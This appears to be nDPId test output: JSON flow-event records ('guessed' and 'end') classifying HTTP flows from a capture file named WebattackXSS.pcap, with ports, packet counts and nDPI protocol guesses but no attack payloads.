+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347994680,"flow_last_seen":1499347999898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347997344,"flow_last_seen":1499348002899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347997344,"flow_last_seen":1499348002899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499348002450,"flow_last_seen":1499348071824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232355,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348007599,"flow_last_seen":1499348012904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348007599,"flow_last_seen":1499348012904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348010145,"flow_last_seen":1499348015905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348010145,"flow_last_seen":1499348015905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348011433,"flow_last_seen":1499348016905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348011433,"flow_last_seen":1499348016905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348012728,"flow_last_seen":1499348017905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348012728,"flow_last_seen":1499348017905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348015250,"flow_last_seen":1499348020905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348015250,"flow_last_seen":1499348020905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348016526,"flow_last_seen":1499348021905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348016526,"flow_last_seen":1499348021905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348019059,"flow_last_seen":1499348024906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348019059,"flow_last_seen":1499348024906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348020357,"flow_last_seen":1499348025907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348020357,"flow_last_seen":1499348025907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348021660,"flow_last_seen":1499348026908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348021660,"flow_last_seen":1499348026908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348024206,"flow_last_seen":1499348029909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348024206,"flow_last_seen":1499348029909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348025497,"flow_last_seen":1499348030909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348025497,"flow_last_seen":1499348030909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348028117,"flow_last_seen":1499348033910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348028117,"flow_last_seen":1499348033910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348029395,"flow_last_seen":1499348034910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348029395,"flow_last_seen":1499348034910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348030687,"flow_last_seen":1499348035910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348030687,"flow_last_seen":1499348035910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348033296,"flow_last_seen":1499348038910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348033296,"flow_last_seen":1499348038910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348034569,"flow_last_seen":1499348039911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348034569,"flow_last_seen":1499348039911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 